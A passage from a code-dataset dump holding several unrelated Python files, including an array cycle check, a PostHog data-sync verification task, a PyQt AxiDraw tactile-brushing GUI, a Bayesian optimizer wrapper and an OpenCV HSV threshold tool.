test_solution()\n","repo_name":"JacksonJW/practice-problems-interview-prep","sub_path":"leetcode/python3/convert_sorted_array_to_binary_search_tree.py","file_name":"convert_sorted_array_to_binary_search_tree.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33280821155","text":"# O(n) time | O(1) space - where n is the length of the input ar\r\n\r\ndef hasSingleCycle(array):\r\n\tnumElementsVisited = 0\r\n\tcurrentIdx = 0\r\n\twhile numElementsVisited < len(array):\r\n\t\tif numElementsVisited > 0 and currentIdx == 0:\r\n\t\t\treturn False\r\n\t\tnumElementsVisited += 1\r\n\t\tcurrentIdx = getNextIdx(currentIdx, array)\r\n\treturn currentIdx == 0\r\n\r\ndef getNextIdx(currentIdx, array):\r\n\tjump = array[currentIdx]\r\n\tnextIdx = (currentIdx + jump) % len(array)\r\n\treturn nextIdx if nextIdx >= 0 else nextIdx + len(array)","repo_name":"Abhishek-Rout/Competitive-Coding","sub_path":"AlgoExpert/2. Medium/Python/Single Cycle Check/Single Cycle Check.py","file_name":"Single Cycle Check.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"39513457049","text":"import json\nfrom collections import Counter, defaultdict\nfrom datetime import timedelta\nfrom typing import Any, Dict, List\n\nimport structlog\nfrom django.db.models.query import Prefetch\nfrom django.utils.timezone import now\n\nfrom posthog.celery import app\nfrom posthog.client import sync_execute\nfrom posthog.models.person import Person\n\nlogger = structlog.get_logger(__name__)\n\n# We check up to LIMIT persons between PERIOD_START..PERIOD_END, in batches of BATCH_SIZE\n# This helps keep the metric \"moving\" as we ship fixes or bugs.\nLIMIT = 100000\nBATCH_SIZE = 500\nPERIOD_START = timedelta(hours=1)\nPERIOD_END = timedelta(days=2)\n\nGET_PERSON_CH_QUERY = \"\"\"\nSELECT id, version, properties FROM person JOIN (\n SELECT id, max(version) as version, max(is_deleted) as is_deleted, team_id\n FROM person\n WHERE team_id IN %(team_ids)s AND id IN (%(person_ids)s)\n GROUP BY team_id, id\n) as person_max ON person.id = person_max.id AND person.version = person_max.version AND person.team_id = person_max.team_id\nWHERE team_id IN %(team_ids)s\n AND person_max.is_deleted = 0\n AND id IN (%(person_ids)s)\n\"\"\"\n\nGET_DISTINCT_IDS_CH_QUERY = \"\"\"\nSELECT distinct_id, argMax(person_id, version) as person_id\nFROM person_distinct_id2\nWHERE team_id IN %(team_ids)s\nGROUP BY team_id, distinct_id\nHAVING argMax(is_deleted, version) = 0 AND person_id IN (%(person_ids)s)\n\"\"\"\n\n\n@app.task(max_retries=1, ignore_result=True)\ndef verify_persons_data_in_sync(\n period_start: timedelta = PERIOD_START,\n period_end: timedelta = PERIOD_END,\n limit: int = LIMIT,\n emit_results: bool = True,\n) -> Counter:\n # :KLUDGE: Rather than filter on created_at directly which is unindexed, we look up the latest value in 'id' column\n # and leverage that to narrow down filtering in an index-efficient way\n max_pk = Person.objects.filter(created_at__lte=now() - period_start).latest(\"id\").id\n person_data = list(\n Person.objects.filter(\n pk__lte=max_pk,\n pk__gte=max_pk - LIMIT * 5,\n created_at__gte=now() - period_end,\n ).values_list(\"id\", \"uuid\", \"team_id\")[:limit]\n )\n person_data.sort(key=lambda row: row[2]) # keep persons from same team together\n\n results = Counter(\n {\n \"total\": 0,\n \"missing_in_clickhouse\": 0,\n 
\"version_mismatch\": 0,\n \"properties_mismatch\": 0,\n \"distinct_ids_mismatch\": 0,\n \"properties_mismatch_same_version\": 0,\n }\n )\n for i in range(0, len(person_data), BATCH_SIZE):\n batch = person_data[i : i + BATCH_SIZE]\n results += _team_integrity_statistics(batch)\n\n if emit_results:\n _emit_metrics(results)\n\n return results\n\n\ndef _team_integrity_statistics(person_data: List[Any]) -> Counter:\n person_ids = [id for id, _, _ in person_data]\n person_uuids = [uuid for _, uuid, _ in person_data]\n team_ids = list(set(team_id for _, _, team_id in person_data))\n\n # :TRICKY: To speed up processing, we fetch all models in batch at once and store results in dictionary indexed by person uuid\n pg_persons = _index_by(\n list(\n Person.objects.filter(id__in=person_ids).prefetch_related(\n Prefetch(\"persondistinctid_set\", to_attr=\"distinct_ids_cache\")\n )\n ),\n lambda p: p.uuid,\n )\n\n ch_persons = _index_by(\n sync_execute(GET_PERSON_CH_QUERY, {\"person_ids\": person_uuids, \"team_ids\": team_ids}),\n lambda row: row[0],\n )\n\n ch_distinct_ids_mapping = _index_by(\n sync_execute(\n GET_DISTINCT_IDS_CH_QUERY,\n {\"person_ids\": person_uuids, \"team_ids\": team_ids},\n ),\n lambda row: row[1],\n flat=False,\n )\n\n result: Counter = Counter()\n for _pk, uuid, team_id in person_data:\n # Person was deleted in the middle of processing, can ignore\n if uuid not in pg_persons:\n continue\n result[\"total\"] += 1\n pg_person = pg_persons[uuid]\n if uuid not in ch_persons:\n result[\"missing_in_clickhouse\"] += 1\n logger.info(\"Found person missing in clickhouse\", team_id=team_id, uuid=uuid)\n continue\n _, ch_version, ch_properties = ch_persons[uuid]\n ch_properties = json.loads(ch_properties)\n if ch_version != pg_person.version:\n result[\"version_mismatch\"] += 1\n logger.info(\n \"Found version mismatch\",\n team_id=team_id,\n uuid=uuid,\n properties=pg_person.properties,\n ch_properties=ch_properties,\n )\n if pg_person.properties != ch_properties:\n result[\"properties_mismatch\"] += 1\n logger.info(\n \"Found properties mismatch\",\n team_id=team_id,\n uuid=uuid,\n properties=pg_person.properties,\n ch_properties=ch_properties,\n )\n\n # :KLUDGE: Verify business logic. 
If versions are in sync so should properties be.\n if ch_version != 0 and ch_version == pg_person.version and pg_person.properties != ch_properties:\n result[\"properties_mismatch_same_version\"] += 1\n\n pg_distinct_ids = list(sorted(map(str, pg_person.distinct_ids)))\n ch_distinct_id = list(sorted(str(distinct_id) for distinct_id, _ in ch_distinct_ids_mapping.get(uuid, [])))\n if pg_distinct_ids != ch_distinct_id:\n result[\"distinct_ids_mismatch\"] += 1\n return result\n\n\ndef _emit_metrics(integrity_results: Counter) -> None:\n from statshog.defaults.django import statsd\n\n for key, value in integrity_results.items():\n statsd.gauge(f\"posthog_person_integrity_{key}\", value)\n\n\ndef _index_by(collection: List[Any], key_fn: Any, flat: bool = True) -> Dict:\n result: Dict = {} if flat else defaultdict(list)\n for item in collection:\n if flat:\n result[key_fn(item)] = item\n else:\n result[key_fn(item)].append(item)\n return result\n","repo_name":"PostHog/posthog","sub_path":"posthog/tasks/verify_persons_data_in_sync.py","file_name":"verify_persons_data_in_sync.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"70506573929","text":"# Created by \"EdgardoCS\" at 22-Aug-23\n__github__ = \"https://github.com/EdgardoCS\"\n__email__ = \"edgardo.silva@uv.cl\"\n\nimport os\nimport sys\nimport time\nimport queue\nimport random\nimport traceback\nimport threading\nimport screeninfo\nimport numpy as np\nimport pandas as pd\nfrom axidraw import brush\n\nfrom PyQt6.QtCore import *\nfrom PyQt6 import QtWidgets\nfrom PyQt6.uic import loadUi\nfrom PyQt6.QtGui import QScreen\nfrom PyQt6.QtWidgets import QMainWindow, QApplication, QInputDialog, QFileDialog, QWidget\n\n\nclass WorkerSignals(QObject):\n \"\"\"\n Defines the signals available from a running worker thread.\n Supported signals are:\n finished\n No data\n error\n tuple (exctype, value, traceback.format_exc() )\n result\n object data returned from processing, anything\n progress\n int indicating % progress\n \"\"\"\n finished = pyqtSignal()\n error = pyqtSignal(tuple)\n result = pyqtSignal(object)\n progress = pyqtSignal(int)\n\n\nclass vasWorker(QRunnable):\n def __init__(self, fn, *args, **kwargs):\n super(vasWorker, self).__init__()\n # Store constructor arguments (re-used for processing)\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = WorkerSignals()\n\n # Add the callback to our kwargs\n self.kwargs['progress_callback'] = self.signals.progress\n\n @pyqtSlot()\n def run(self):\n \"\"\"\n Initialise the runner function with passed args, kwargs.\n \"\"\"\n try:\n result = self.fn(*self.args, **self.kwargs)\n except:\n traceback.print_exc()\n exctype, value = sys.exc_info()[:2]\n self.signals.error.emit((exctype, value, traceback.format_exc()))\n else:\n self.signals.result.emit(result) # Return the result of the processing\n finally:\n self.signals.finished.emit() # Done\n\n\nclass Worker(QRunnable):\n \"\"\"\n Worker thread\n Inherits from QRunnable to handler worker thread setup, signals and wrap-up.\n\n :param callback: The function callback to run on this worker thread. 
Supplied args and\n kwargs will be passed through to the runner.\n :type callback: function\n :param args: Arguments to pass to the callback function\n :param kwargs: Keywords to pass to the callback function\n \"\"\"\n\n def __init__(self, fn, *args, **kwargs):\n super(Worker, self).__init__()\n # Store constructor arguments (re-used for processing)\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n self.signals = WorkerSignals()\n\n # Add the callback to our kwargs\n self.kwargs['progress_callback'] = self.signals.progress\n\n @pyqtSlot()\n def run(self):\n \"\"\"\n Initialise the runner function with passed args, kwargs.\n \"\"\"\n # Retrieve args/kwargs here; and fire processing using them\n try:\n result = self.fn(*self.args, **self.kwargs)\n except:\n traceback.print_exc()\n exctype, value = sys.exc_info()[:2]\n self.signals.error.emit((exctype, value, traceback.format_exc()))\n else:\n self.signals.result.emit(result) # Return the result of the processing\n finally:\n self.signals.finished.emit() # Done\n\n\nclass AxiDraw(threading.Thread):\n \"\"\"\n AxiDraw main thread\n Set of functions to communicate with axidraw device, can manipulate port (open, close) and send\n signals to initialize movement(move_x, move_y, pen_up, pen_down.\n \"\"\"\n\n def __init__(self, q_in, q_out):\n threading.Thread.__init__(self)\n self.serial_port = None\n self.running = True\n self.serial_status = False\n self.running = True\n self.q_in = q_in\n self.q_out = q_out\n\n def stop(self):\n self.running = False\n # Here we need to close the serial port!\n print('Axidraw thread stopped')\n\n def run(self):\n while self.running:\n msg = self.q_in.get()\n if msg == 'open_port':\n port = brush.findPort() # Success!! Axidraw founded in COMPort\n if port:\n self.serial_port, self.serial_status = brush.openPort(port)\n if self.serial_port:\n if self.serial_status:\n self.q_out.put(self.serial_port.name, self.serial_status)\n # return self.serial_port.name\n else:\n self.q_out.put(self.serial_port.name)\n # return self.serial_port.name\n else:\n print('Could not find a port with an AxiDraw connected')\n self.q_out.put('not-OK')\n else:\n print('Could not find a port with an AxiDraw connected')\n self.q_out.put('not-OK')\n\n if msg == 'close_port':\n port = brush.findPort()\n if port is None:\n print('Could not find a port with an AxiDraw connected')\n else:\n print('Closing port', port)\n self.serial_port = brush.closePort(port)\n\n if msg[0] == 'hellofriend.mov':\n brush.sendEnableMotors(self.serial_port, 2)\n speed = msg[1]\n direction = msg[2]\n distance = msg[3]\n # print('Brushing at ' + str(speed) + ' cm/s')\n if direction == 'Left to Right':\n brush.pen_down(self.serial_port)\n brush.move_x(self.serial_port, distance, speed)\n brush.pen_up(self.serial_port)\n brush.move_x(self.serial_port, -distance, 3)\n elif direction == 'Right to Left':\n brush.pen_down(self.serial_port)\n brush.move_x(self.serial_port, -distance, 3)\n brush.pen_up(self.serial_port)\n brush.move_x(self.serial_port, distance, speed)\n\n # circular movement\n elif direction == 'CW':\n brush.pen_down(self.serial_port)\n brush.move_circular(self.serial_port, speed, 0.67, 1, direction)\n brush.pen_up(self.serial_port)\n elif direction == 'ACW':\n brush.pen_down(self.serial_port)\n brush.move_circular(self.serial_port, speed, 0.67, 1, direction)\n brush.pen_up(self.serial_port)\n\n brush.sendDisableMotors(self.serial_port)\n self.q_out.put('OK')\n\n\n# Queue params:\nq_to_ad = queue.Queue()\nq_from_ad = queue.Queue()\naxidraw = 
AxiDraw(q_to_ad, q_from_ad)\n\naxidraw.daemon = True\naxidraw.start()\n\nWorker.daemon = True\n\n\nclass secondWindow(QMainWindow):\n # VAS UI\n def __init__(self, parent=None):\n super(secondWindow, self).__init__()\n loadUi(\"gui/vas.ui\", self)\n\n self.vasSlider.valueChanged.connect(self.updateDisplay)\n self.vasSubmit.clicked.connect(self.getValues)\n\n def getValues(self):\n # Get values from Slider and print results in console\n # TODO: Store data and export (if exists: append to csv)\n print(self.vasSlider.value())\n # print(q_to_ad.put(['hellofriend.mov', trial, direction, distance])) #EXPORT\n\n self.close()\n\n def updateDisplay(self):\n # Update digital display as the sliders moves\n self.vasCurrent.display(self.vasSlider.value())\n\n\nclass MainUI(QMainWindow):\n # Main UI\n def __init__(self):\n super(MainUI, self).__init__()\n loadUi(\"gui/mainGui.ui\", self)\n\n # Threading neccesary for worker (another thread used in for loop during stimulation\n self.threadpool = QThreadPool()\n\n self.statusBar.showMessage('Ready')\n\n # bind buttons to functions\n self.loadExperiment.triggered.connect(self.loadExperimentAction)\n self.saveExperiment.triggered.connect(self.saveExperimentAction)\n self.loadSubject.triggered.connect(self.loadSubjectAction)\n self.saveSubject.triggered.connect(self.saveSubjectAction)\n self.ResetButton.clicked.connect(self.resetSubject)\n self.BeginButton.clicked.connect(self.startExperiment)\n self.ConnectButton.clicked.connect(self.connectDevice)\n self.actionExit.triggered.connect(QtWidgets.QApplication.quit)\n self.clearButton.clicked.connect(self.clearAction)\n self.clearConsole.clicked.connect(self.clearConsoleAction)\n\n def printToConsole(self, text):\n \"\"\"\n Print functions output into UI console (PlainText)\n :param self:\n :param text: text(str)\n \"\"\"\n\n self.ConsoleOutput.appendPlainText('- ' + text)\n self.ConsoleOutput.ensureCursorVisible()\n\n def loadExperimentAction(self):\n # load a experiment file\n filename = QFileDialog.getOpenFileName(self,\n caption=\"Open Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\"\n )\n\n if filename[0] == \"\":\n return\n data = pd.read_csv(filename[0], header=None)\n self.updateExperiment(data)\n\n def updateExperiment(self, data):\n \"\"\"\n Update experiment UI with loaded data\n :param self:\n :param data: incoming data from LoadExperimentAction function, python list\n \"\"\"\n self.movementPath.setCurrentText(data[1][0])\n self.bodySite.setCurrentText(data[1][1])\n self.movementDirection.setCurrentText(data[1][2])\n self.velocitiesInput.setText(data[1][3])\n self.distanceInput.setText(data[1][4])\n self.repetitionsInput.setText(data[1][5])\n self.intertrialIntput.setText(data[1][6])\n self.vastimeInput.setText(data[1][7])\n\n def saveExperimentAction(self):\n # save a experiment file\n data = [self.movementPath.currentText(),\n self.bodySite.currentText(),\n self.movementDirection.currentText(),\n self.velocitiesInput.displayText(),\n self.distanceInput.displayText(),\n self.repetitionsInput.displayText(),\n self.intertrialIntput.displayText(),\n self.vastimeInput.displayText()]\n\n self.printToConsole('Saving data')\n filename = QFileDialog.getSaveFileName(\n caption=\"Save Experiment\",\n filter=\"Comma Separated Values CSV Files (*.csv)\",\n initialFilter=\"csv\"\n )\n\n if filename[0] == \"\":\n return\n\n indexRow = [\"Path\", \"Site\",\n \"Movement\", \"Velocity\",\n \"Distance\", \"Repetitions\",\n \"VasTime\", \"InterTime\"]\n dataToCsv = pd.DataFrame(data, 
index=indexRow)\n dataToCsv.to_csv(str(filename[0]), header=False)\n\n def loadSubjectAction(self):\n # load a subject file\n filename = QFileDialog.getOpenFileName(self,\n caption=\"Open Subject\",\n filter=\"Comma Separated Values CSV Files (*.csv)\"\n )\n\n if filename[0] == \"\":\n return\n\n data = pd.read_csv(filename[0], header=None)\n self.updateSubject(data)\n\n def saveSubjectAction(self):\n # save a subject file\n data = [self.subjectInput.displayText(),\n self.ageInput.displayText(),\n self.genderInput.currentText(),\n self.handInput.currentText()]\n\n self.printToConsole('Saving data')\n filename = QFileDialog.getSaveFileName(\n caption=\"Save Subject\",\n filter=\"Comma Separated Values CSV Files (*.csv)\",\n initialFilter=\"csv\"\n )\n\n if filename[0] == \"\":\n return\n\n indexRow = [\"Subject\", \"Age\",\n \"Gender\", \"Handedness\"]\n dataToCsv = pd.DataFrame(data, index=indexRow)\n dataToCsv.to_csv(str(filename[0]), header=False)\n\n def updateSubject(self, data):\n self.subjectInput.setText(data[1][0])\n self.ageInput.setText(data[1][1])\n self.genderInput.setCurrentText(data[1][2])\n self.handInput.setCurrentText(data[1][3])\n\n def resetSubject(self):\n self.subjectInput.setText(\"\")\n self.ageInput.setText(\"\")\n self.genderInput.setCurrentIndex(0)\n self.handInput.setCurrentIndex(0)\n\n def clearAction(self):\n self.movementPath.setCurrentIndex(0)\n self.bodySite.setCurrentIndex(0)\n self.movementDirection.setCurrentIndex(0)\n self.velocitiesInput.setText(\"\")\n self.distanceInput.setText(\"\")\n self.repetitionsInput.setText(\"\")\n self.intertrialIntput.setText(\"\")\n self.vastimeInput.setText(\"\")\n\n def clearConsoleAction(self):\n self.ConsoleOutput.clear()\n\n def connectDevice(self):\n q_to_ad.put('open_port')\n answer = q_from_ad.get()\n if answer[:3] == 'COM':\n # print(answer)\n # TODO: read all incoming PORTs more elegantly\n\n self.connectedBox.setCheckable(True)\n self.connectedBox.setChecked(True)\n\n self.poweredBox.setCheckable(True)\n self.poweredBox.setChecked(True)\n\n self.ConnectButton.setEnabled(False)\n\n self.connectedBox.setEnabled(False)\n self.poweredBox.setEnabled(False)\n\n def execute_brushing(self, progress_callback):\n \"\"\"\n new Thread! 
Execute trials and send signals to brush through Queue\n :param self\n :param progress_callback: Real-time feedback from worker\n \"\"\"\n self.BeginButton.setEnabled(False)\n trialsRnd = []\n data = self.getExperimentData()\n\n direction = data[2]\n trials = data[3].split(\";\")\n distance = int(data[4])\n reps = int(data[5])\n interTime = int(data[6])\n VasTime = int(data[7])\n\n totalTrials = len(trials) * reps\n trialCount = 1\n\n trials = [eval(i) for i in trials]\n\n for i in range(0, reps):\n trialsRnd.append(random.sample(trials, len(trials)))\n for cycle in trialsRnd:\n for trial in cycle:\n answer = None\n self.printToConsole('Brushing at ' + str(trial) + ' cm/s')\n # add from here to csv, combine with vas results?\n q_to_ad.put(['hellofriend.mov', trial, direction, distance])\n answer = q_from_ad.get()\n progress_callback.emit(totalTrials - trialCount)\n trialCount += 1\n \"\"\"\n flag1 = time.time()\n flag2 = time.time()\n \n while trialCount < totalTrials:\n if flag2 - flag1 >= VasTime:\n flag1 = flag2\n flag2 = time.time()\n trialCount += 1\n else:\n flag2 = time.time()\n else:\n \"\"\"\n time.sleep(interTime)\n self.BeginButton.setEnabled(True)\n return 'Done'\n\n def newWindow(self):\n self.w = secondWindow()\n self.w.show()\n\n def print_output(self, s):\n if s:\n print(s)\n\n def thread_complete(self):\n self.printToConsole(\"Tactile stimulation complete\")\n\n def progress_fn(self, n):\n self.printToConsole('Trials left: ' + str(n))\n self.newWindow()\n\n def startExperiment(self):\n if self.ConnectButton.isEnabled():\n self.printToConsole('MultiTAC is not connected, please connect')\n else:\n worker = Worker(self.execute_brushing)\n worker.signals.result.connect(self.print_output)\n worker.signals.finished.connect(self.thread_complete)\n worker.signals.progress.connect(self.progress_fn)\n # Execute\n self.threadpool.start(worker)\n\n def getExperimentData(self):\n # self.printToConsole('Starting Experiment')\n data = [self.movementPath.currentText(),\n self.bodySite.currentText(),\n self.movementDirection.currentText(),\n self.velocitiesInput.displayText(),\n self.distanceInput.displayText(),\n self.repetitionsInput.displayText(),\n self.intertrialIntput.displayText(),\n self.vastimeInput.displayText()]\n return data\n\n\nif __name__ == \"__main__\":\n debugger = True\n\n if debugger:\n app = QApplication(sys.argv)\n qt_app = MainUI()\n qt_app.show()\n app.exec()\n","repo_name":"EdgardoCS/BrushGui","sub_path":"MultiTAC.py","file_name":"MultiTAC.py","file_ext":"py","file_size_in_byte":16898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2234729535","text":"from openpyxl import Workbook\r\nimport string\r\nimport os\r\n\r\nfile_name = []\r\nfolder = \"C:/Users/Turi/PycharmProjects/test\"\r\nfor file in os.listdir(folder):\r\n if file.endswith(\".txt\"):\r\n file_name.append(file)\r\n\r\n\r\nworkbook = Workbook()\r\nfor i in file_name:\r\n workbook.create_sheet(i)\r\n\r\nabc = string.ascii_uppercase\r\n\r\nfor txt_file in file_name:\r\n row = 1\r\n column = 0\r\n header = True\r\n sheet = workbook[txt_file]\r\n with open(txt_file, \"r\") as file:\r\n lines = file.readlines()\r\n for line in lines:\r\n line = line.split('|')\r\n if len(line) > 20 and line[1].startswith(\"P\") and header:\r\n for header_data in line:\r\n cell = abc[column] + str(row)\r\n sheet[cell] = header_data\r\n column += 1\r\n header = False\r\n row += 1\r\n if len(line) > 20 and line[1].startswith(\"3\"):\r\n column = 0\r\n for data in line:\r\n cell = 
abc[column] + str(row)\r\n sheet[cell] = data\r\n column += 1\r\n column = 0\r\n row += 1\r\n\r\nworkbook.save(filename=\"bence.xlsx\")\r\n\r\n","repo_name":"TurcsanyAdam/Bence_excell","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32335044162","text":"for _ in range(int(input())):\r\n coin = sorted(list(map(int, input().split()))[1:])\r\n flag = True\r\n\r\n for i in range(1, len(coin)):\r\n if coin[i - 1] * 2 > coin[i]:\r\n flag = False\r\n break\r\n\r\n print(f\"Denominations: \" + \" \".join(map(str, coin)))\r\n print(\"Good coin denominations!\" if flag else \"Bad coin denominations!\")\r\n print()","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Bronze/26350.py","file_name":"26350.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33130369456","text":"import numpy as np\n\nfrom ..bayes_opt import BayesianOptimization\nfrom ..bayes_opt.helpers import acq_max, UtilityFunction\nfrom random import random\nfrom sklearn.preprocessing import StandardScaler\nfrom ..other import random_sample\nimport datetime\n\ndef noop(*kargs, **kwargs):\n # stub function for bo\n return None\n\n\nclass BayesianOptimizer():\n def __init__(self, space, conf={}):\n conf = {\n **conf,\n 'pbounds': space, #conf bounds\n }\n self.space = space\n self.conf = conf\n#########conf contains acq, use; else use default\n self.acq = conf.get('acq', 'ei')\n self.kappa = conf.get('kappa', 2.576)\n self.xi = conf.get('xi', 0.0)\n self.history_data=np.loadtxt('memory_km/datasetforGP.txt')\n self.history_data_y=np.loadtxt('memory_km/dataset.txt')\n self.xx=self.history_data[:]\n self.yy=-self.history_data_y[:,32] # -y\n print('space=',self.space)\n x=self.xx[:1480,:] # wc 1310 pr 1225\n # print(x)\n # StandardScaler= x-mean/var normal\n standardscaler = StandardScaler()\n self.scaler=standardscaler.fit(x)\n x = self.scaler.transform(x)\n\n # print(x)\n\n try:\n del conf['acq'], conf['kappa'], conf['xi']\n except:\n pass\n #print(self.space)\n self.bo = BayesianOptimization(**self._make_config(conf))\n starttime1 = datetime.datetime.now()\n\n self.bo.gp.fit(x, self.yy)\n endtime1 = datetime.datetime.now()\n duringtime1 = endtime1 - starttime1\n\n print('GP model trained..time',duringtime1)\n # print('show make config:')\n # print(self._make_config(conf))\n\n def _make_config(self, conf):\n return {\n **conf,\n 'f': noop\n }\n\n def add_observation(self, ob):\n # ob: (x, y) while x is argument dict\n # _x:{'key1':v1,'key2':v2,.....}\n _x, y = ob\n # print('show ob_x, i.e, sampled_config_numeric:')\n # print(_x)\n # print('show ob.y, i.e, metric_result:')\n # print(y)\n # dict to tuple regarding keys in self.space\n x = []\n for k in self.space.keys():\n x.append(_x[k])\n# x=[conf1,conf2,...]\n # print(x,y)\n # add ob into bo space\n #\n # self.bo.space._Yview=[-240,-240,-121.41]\n try:\n print('bo space before add observation',self.bo.space)\n #space.add_observation(x, y) is define in the TargetSpace.py file\n self.bo.space.add_observation(x, y)\n except KeyError as e:\n # get exception message\n msg, = e.args\n raise Exception(msg)\n # print('show ob.space.X,only values no keys:')\n # print(self.bo.space.X)\n # print('show ob.space.Y:')\n # print(self.bo.space.Y)\n # XX=self.bo.space.X\n # YY=self.bo.space.Y\n # XX=self.xx\n # YY=self.yy\n\n # XX.append(self.bo.space.X)\n 
# YY.append(self.bo.space.Y)\n # print('XX and YY-----------')\n\n# todo operate in here!!\n# self.bo.gp.fit(XX,YY)\n\n\n def get_conf(self):\n acq = self.acq\n kappa = self.kappa\n xi = self.xi\n scaler=self.scaler\n # bo recalculates next best conf\n # codes below are adapted from implementation of bo.maximize\n\n # assert self.bo.space.Y is not None and len(\n # self.bo.space.Y) > 0, 'at least one observation is required before asking for next configuration'\n if self.bo.space.Y is None or len(self.bo.space.Y) == 0:\n x_max = self.bo.space.random_points(1)[0]\n else:\n\n print(' start find max')\n starttime = datetime.datetime.now()\n x_max = acq_max(\n ac=UtilityFunction(\n kind=acq,\n kappa=kappa,\n xi=xi,\n scaler=scaler\n ).utility,\n gp=self.bo.gp,\n scaler=self.scaler,\n y_max=self.bo.space.Y.max(),\n bounds=self.bo.space.bounds,\n random_state=self.bo.random_state,\n **self.bo._acqkw\n )\n\n print(' compelete find max')\n endtime = datetime.datetime.now()\n duringtime = endtime - starttime\n print(duringtime)\n\n # print('x_max=',x_max)\n # check if x_max repeats\n if x_max in self.bo.space:\n x_max = self.bo.space.random_points(1)[0]\n\n # print('show xmax from acqmax():')\n # print(x_max)\n return self._convert_to_dict(x_max)\n\n def _convert_to_dict(self, x_array):\n # print('show self.space, not self.bo.space, should be{'':()}:')\n # print(self.space)\n return dict(zip(self.space, x_array))\n\n\nclass ConfigedBayesianOptimizer(BayesianOptimizer):\n # Processing parameter space: Continuous and discrete\n def __init__(self, config, bo_conf={}):\n self._config = {**config}\n #print(self._config)\n bo_space = {}\n for k, v in self._config.items():\n v_range = v.get('range')\n if v_range: # discrete ranged parameter\n bo_space[k] = (0, len(v_range)) # note: right-close range\n else:\n bo_space[k] = (v['min'], v['max'])\n #print(bo_space)\n #print(bo_conf)\n super().__init__(bo_space, bo_conf)\n\n # get conf and convert to legal config\n def get_conf(self):\n sample = super().get_conf()\n print('show sample from father\\'s get_conf:')\n print(sample)\n # first is continuous value, second is translated\n return sample, self._translate(sample)\n\n def random_sample(self):\n result = {}\n for k, v in self._config.items():\n v_range = v.get('range')\n if v_range:\n result[k] = random() * len(v_range)\n else:\n minn, maxx = v.get('min'), v.get('max')\n result[k] = random() * (maxx - minn) + minn\n return result, self._translate(result)\n\n def _translate(self, sample):\n result = {}\n # orders in sample are the same as in _config dict\n # see: https://github.com/fmfn/BayesianOptimization/blob/d531dcab1d73729528afbffd9a9c47c067de5880/bayes_opt/target_space.py#L49\n # self.bounds = np.array(list(pbounds.values()), dtype=np.float)\n for sample_value, (k, v) in zip(sample.values(), self._config.items()):\n v_range = v.get('range')\n if v_range:\n try:\n index = int(sample_value)\n if index == len(v_range):\n index -= 1\n result[k] = v_range[index]\n except Exception as e:\n print('ERROR!')\n print(k, sample_value)\n print(v_range)\n raise e\n else:\n is_float = v.get('float', False)\n result[k] = sample_value if is_float else int(sample_value)\n #print(result)\n return result\n","repo_name":"wiluen/DeepCAT","sub_path":"test_kit/ultimate/lib/optimizer/bo.py","file_name":"bo.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72177412648","text":"#Trackbar find the specific Value 
HSV\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef callback(x):\r\n pass\r\n\r\ncv2.namedWindow('Input_Range')\r\n\r\nilowH = 0\r\nihighH = 360\r\n\r\nilowS = 0\r\nihighS = 255\r\n\r\nilowV = 0\r\nihighV = 255\r\n\r\n#create trackbars for color change\r\ncv2.createTrackbar('low_HUE','Input_Range',ilowH,360,callback)\r\ncv2.createTrackbar('high_HUE','Input_Range',ihighH,360,callback)\r\n\r\ncv2.createTrackbar('low_Saturate','Input_Range',ilowS,255,callback)\r\ncv2.createTrackbar('high_Saturate','Input_Range',ihighS,255,callback)\r\n\r\ncv2.createTrackbar('low_Intensity','Input_Range',ilowV,255,callback)\r\ncv2.createTrackbar('high_Intensity','Input_Range',ihighV,255,callback)\r\n\r\nfile_path = 'Board.jpg'\r\n\r\nwhile(1):\r\n cap = cv2.imread(file_path,1)\r\n \r\n #get Trackbar positions\r\n ilowH = cv2.getTrackbarPos('low_HUE','Input_Range')\r\n ihighH = cv2.getTrackbarPos('high_HUE','Input_Range')\r\n ilowS = cv2.getTrackbarPos('low_Saturate','Input_Range')\r\n ihighS = cv2.getTrackbarPos('high_Saturate','Input_Range')\r\n ilowV = cv2.getTrackbarPos('low_Intensity','Input_Range')\r\n ihighV = cv2.getTrackbarPos('high_Intensity','Input_Range')\r\n \r\n hsv = cv2.cvtColor(cap, cv2.COLOR_BGR2HSV)\r\n cv2.imshow('RGB',cap)\r\n lower_hsv = np.array([ilowH,ilowS,ilowV])\r\n higher_hsv = np.array([ihighH,ihighS,ihighV])\r\n mask = cv2.inRange(hsv,lower_hsv,higher_hsv)\r\n #cv2.imshow('mask',mask)\r\n \r\n cap = cv2.bitwise_and(cap,cap,mask=mask)\r\n \r\n #show Thresholded image\r\n cv2.imshow('cap',cap)\r\n \r\n #print(ilowH,ilowS,ilowV)\r\n if(cv2.waitKey(1) & 0xFF == ord('q')):\r\n break\r\ncv2.destroyAllWindows()\r\n","repo_name":"ema2541/WDProject_RobotArm","sub_path":"02_find_upper_lower_color.py","file_name":"02_find_upper_lower_color.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74479463529","text":"import numpy as np\nimport random\n\nclass MyBattlesnakeHeuristics:\n '''\n The BattlesnakeHeuristics class allows you to define handcrafted rules of the snake.\n '''\n FOOD_INDEX = 0\n def __init__(self):\n pass\n \n def go_to_food_if_close(self, state, json):\n '''\n Example heuristic to move towards food if it's close to you.\n '''\n # Get the position of the snake head\n your_snake_body = 